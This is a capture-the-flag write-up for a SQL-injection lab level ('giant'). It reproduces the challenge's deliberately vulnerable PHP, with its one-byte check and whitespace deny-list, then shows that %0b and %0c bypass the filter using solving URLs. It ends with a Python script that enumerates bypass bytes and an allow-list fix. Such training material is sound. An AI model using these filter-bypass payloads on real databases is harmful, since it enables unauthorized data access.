Oh! JUN
[Lord Of SQL Injection] No. 14 (giant)
query : select 1234 fromprob_giant where 1
<?php
include "./config.php";
login_chk();
$db = dbconnect();
// Only a single byte is accepted, so multi-character separators such as /**/ are out.
if(strlen($_GET[shit])>1) exit("No Hack ~_~");
// Deny-list: only space, \n, \r and \t are blocked; any other byte gets through.
if(preg_match('/ |\n|\r|\t/i', $_GET[shit])) exit("HeHe");
// The byte lands directly between "from" and "prob_giant", with no quoting at all.
$query = "select 1234 from{$_GET[shit]}prob_giant where 1";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
// Any row coming back means the query parsed, which clears the level.
if($result[1234]) solve("giant");
highlight_file(__FILE__);
?>
"from" and "prob_giant" are run together, so we have to put a separator between them.
\n, \r and \t, the characters most often used to get around a whitespace filter, are all blocked, and the strlen check leaves room for exactly one byte, so multi-character separators such as /**/ are out as well.
So I looked up which other whitespace bytes exist:
%09 : tab (\t)
%0a : line feed (\n)
%0b : vertical tab (\v)
%0c : form feed (\f)
%0d : carriage return (\r)
%09, %0a and %0d are filtered, so let's try the remaining two, %0b and %0c. MySQL's lexer treats both of them as whitespace between tokens, so either one should split "from" from "prob_giant".
https://los.rubiya.kr/chall/giant_18a08c3be1d1753de0cb157703f75a5e.php?shit=%0c
query : select 1234 fromprob_giant where 1
GIANT Clear!
(The 0x0c byte is present in the echoed query between "from" and "prob_giant"; it just does not render as a visible gap in the browser.)
https://los.rubiya.kr/chall/giant_18a08c3be1d1753de0cb157703f75a5e.php?shit=%0b
query : select 1234 fromprob_giant where 1
GIANT Clear!
(Same as with the form feed: the 0x0b byte is in the query but invisible in the rendered output.)
Both %0b and %0c work: each is a single byte, neither is on the deny-list, and MySQL accepts either as a token separator. The lesson is that a deny-list of a few whitespace characters does not match what the database's lexer actually treats as whitespace; an allow-list (or not placing user input in that position at all) is the fix.
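As an added example (not code from the original post or from the challenge), here is a Python port of the two PHP checks. It enumerates all 256 single-byte values, keeps those that survive the filter and are still whitespace for MySQL's lexer, percent-encodes them for the GET parameter, and shows the allow-list check that would have closed the gap. The MYSQL_WHITESPACE set is an assumption about the server, backed by the page's own results for %0b and %0c; all function names are mine.

```python
import re
from urllib.parse import quote

# Constructed example, not code from the original post: a Python port of the
# challenge's two checks, used to find which single bytes get through and
# still act as a token separator for MySQL.

# Same pattern as the PHP preg_match('/ |\n|\r|\t/i', ...): a deny-list of
# four whitespace characters.
DENY_LIST_RE = re.compile(r" |\n|\r|\t")

# Assumption about the server: bytes MySQL's lexer accepts as whitespace
# between tokens. Space, \t, \n and \r are the obvious ones; the page's own
# results confirm \v (0x0b) and \f (0x0c) as well.
MYSQL_WHITESPACE = {"\x20", "\x09", "\x0a", "\x0b", "\x0c", "\x0d"}


def passes_php_filter(payload):
    """Mirror the challenge: strlen() > 1 is rejected, then the deny-list regex."""
    # strlen() counts bytes, so encode before measuring; latin-1 keeps one byte
    # per character for the 0x00-0xff range enumerated below.
    if len(payload.encode("latin-1")) > 1:
        return False
    return DENY_LIST_RE.search(payload) is None


def build_query(payload):
    """The exact string the PHP builds: the payload lands between 'from' and 'prob_giant'."""
    return f"select 1234 from{payload}prob_giant where 1"


def usable_separators():
    """Every single byte that survives the filter AND still splits the two tokens."""
    return [chr(b) for b in range(256)
            if passes_php_filter(chr(b)) and chr(b) in MYSQL_WHITESPACE]


def encode_for_url(ch):
    """Percent-encode one separator for the GET parameter (0x0b -> %0B)."""
    return quote(ch, safe="")


def hardened_filter(payload):
    """Allow-list alternative to the deny-list: accept only a single [A-Za-z0-9_],
    which rules out every whitespace byte (including \\v and \\f) instead of the
    four the original regex happened to name."""
    return re.fullmatch(r"[A-Za-z0-9_]", payload) is not None


if __name__ == "__main__":
    # Prints the two parameters that clear the level and the query each produces.
    for ch in usable_separators():
        print(f"shit={encode_for_url(ch)} -> {build_query(ch)!r}")
```

Running it lists exactly the two parameters used on the page, shit=%0B and shit=%0C. The hardened_filter function is the allow-list version a reviewer would ask for: it rejects every byte the deny-list missed, and it would still be wrong to interpolate even an allow-listed value into a table-name position, which is why the real fix is to keep user input out of that part of the statement entirely.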